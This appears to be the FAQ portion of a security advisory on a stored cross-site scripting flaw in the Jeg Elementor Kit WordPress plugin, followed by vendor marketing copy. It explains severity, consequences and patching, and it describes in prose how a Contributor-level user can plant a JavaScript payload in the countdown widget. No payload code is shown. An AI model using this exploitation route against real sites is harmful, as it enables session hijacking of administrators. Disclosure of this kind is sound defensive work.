The vulnerability is patched in version 3.0.2 of the Jeg Elementor Kit plugin. It is recommended to update the plugin to this version or later immediately. Additionally, review user roles and limit access to trusted users only.
What does the CVSS score of 6.4 indicate?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Exploitation can lead to serious consequences such as session hijacking or data exfiltration, particularly affecting site administrators.
What is stored cross-site scripting?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored and served to users. This type of vulnerability can have widespread effects, as the malicious script can execute in the browsers of all users who view the affected content.
How does the proof of concept demonstrate the issue?
Technical illustration of exploitation
The proof of concept outlines how an authenticated user can exploit the vulnerability by logging into a WordPress site, injecting a JavaScript payload into the countdown widget, and triggering it to execute when the countdown completes. This illustrates the ease of exploitation for users with Contributor access.
What are the potential consequences of exploitation?
Risks associated with the vulnerability
Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of an administrator’s session, leading to session hijacking, unauthorized access, site defacement, or malware distribution. The stored nature of the payload means it can affect all users who view the compromised content.
What additional measures can I take to secure my site?
Best practices for WordPress security
In addition to updating the plugin, consider implementing security measures such as using a web application firewall, regularly auditing user roles and permissions, and employing security plugins that can help detect and mitigate vulnerabilities.
Is it safe to continue using the Jeg Elementor Kit plugin?
Evaluating ongoing risks
If you have updated to version 3.0.2 or later, it is safe to continue using the Jeg Elementor Kit plugin. However, if you are using an older version, it is recommended to update immediately to avoid potential exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations